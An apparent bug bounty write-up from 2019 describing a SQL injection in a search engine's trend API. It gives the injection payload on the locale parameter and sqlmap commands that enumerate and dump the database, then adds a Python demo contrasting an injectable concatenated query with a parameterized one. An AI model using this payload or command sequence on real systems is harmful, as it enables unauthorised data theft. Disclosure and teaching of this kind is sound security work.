SQL Injection Bug Bounty POC!

Arif-ITSEC111
2 min read, Jul 11, 2019


Good Dayyy Everyone,

A few days ago, I tried to join a bug bounty program, and I searched for a program that was still running and managed.

I found the **** program.

FYI, the target is a European search engine, like Google or something. I guess the target is in France.

The scope is: *.xxxx.com

OK, let's get to the point.

I found the vulnerability on api.xxx.com.

This is the raw request that I got in Burp:

GET /api/trend/get?locale=en_GB&device=desktop&uiv=4 HTTP/1.1
Host: api.xxxx.com
Content-Type: application/x-www-form-urlencoded
Origin: https://www.xxx.com
Connection: close
blablabla

This is my payload: locale=en_GB') AND 1234=(SELECT (CASE WHEN (1234=1234) THEN 1234 ELSE (SELECT 4376 UNION SELECT 4107) END))-- BWMI&device=desktop&uiv=4

  1. I saved the raw request into Notepad as a .txt file.
  2. I ran sqlmap from my terminal (because I use a Mac). I used only this: sqlmap -r /xxx/xxx/xxx/files.txt --dbs
  3. I got some cool stuff there: I got the database.
  4. Then I tried to get more than the dbs. I checked the tables first using this: sqlmap -r /xxx/xxx/xxx/files.txt -D xxx --tables
  5. I found a lot of tables there, but there was something interesting for me. Then I tried to get the columns:
  6. sqlmap -r /xxx/xxx/xxx/files.txt -D xxx -T xxx --columns
  7. I got the columns. Very interesting. Then I tried to get the fields of the DB.
  8. TADAAAA, I GOT what I wanted.
ehehehehe….
  9. Create a report, and submit the report.
  10. Status: on review, then status changed to accepted, and now solved.
  • 2 July 2019 — report
  • 2 July 2019 — accepted
  • 9 July 2019 — ask for verification or retest
  • 9 July 2019 — solved
  • 2019-07-12 13:53:51 5000 EURO BOUNTY HAS COME
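
The report was marked solved, but the post does not say how the locale parameter was fixed. The following is an added example, not code from the post or from the program's API: it runs the payload quoted above against a concatenated query and against a validated, parameterized one. The `trends` table, the in-memory SQLite database, the function names and the locale format are all assumptions made for illustration.

```python
import re
import sqlite3

# Payload value quoted from the post (ASCII quote and dashes restored).
PAYLOAD = ("en_GB') AND 1234=(SELECT (CASE WHEN (1234=1234) THEN 1234 "
           "ELSE (SELECT 4376 UNION SELECT 4107) END))-- BWMI")
# Assumption: valid locales look like "en_GB"; the real allowlist is unknown.
LOCALE_RE = re.compile(r"[a-z]{2}_[A-Z]{2}")


def make_db():
    """Constructed sample data; the target's real schema is not in the post."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE trends (locale TEXT, term TEXT)")
    db.executemany("INSERT INTO trends VALUES (?, ?)",
                   [("en_GB", "football"), ("en_GB", "weather"), ("fr_FR", "meteo")])
    return db


def trends_vulnerable(db, locale):
    # BEFORE: input is concatenated into the statement, so ') closes the
    # string literal and the rest of the value is parsed as SQL.
    sql = "SELECT term FROM trends WHERE (locale = '" + locale + "') ORDER BY term"
    return [row[0] for row in db.execute(sql)]


def trends_parameterized(db, locale):
    # AFTER: the value is bound, so it is only ever compared as data.
    sql = "SELECT term FROM trends WHERE (locale = ?) ORDER BY term"
    return [row[0] for row in db.execute(sql, (locale,))]


def trends_safe(db, locale):
    # Defence in depth: reject anything that is not a well-formed locale
    # before it reaches the database layer at all.
    if not LOCALE_RE.fullmatch(locale):
        raise ValueError("invalid locale")
    return trends_parameterized(db, locale)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", trends_vulnerable(db, PAYLOAD))
    print("parameterized:", trends_parameterized(db, PAYLOAD))
    try:
        trends_safe(db, PAYLOAD)
    except ValueError as exc:
        print("validated    :", exc)
```

In the concatenated version the payload returns the en_GB rows even though no row has that string as its locale, which is the behaviour difference a scanner keys on; the bound version returns nothing and the validated version never runs the query.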
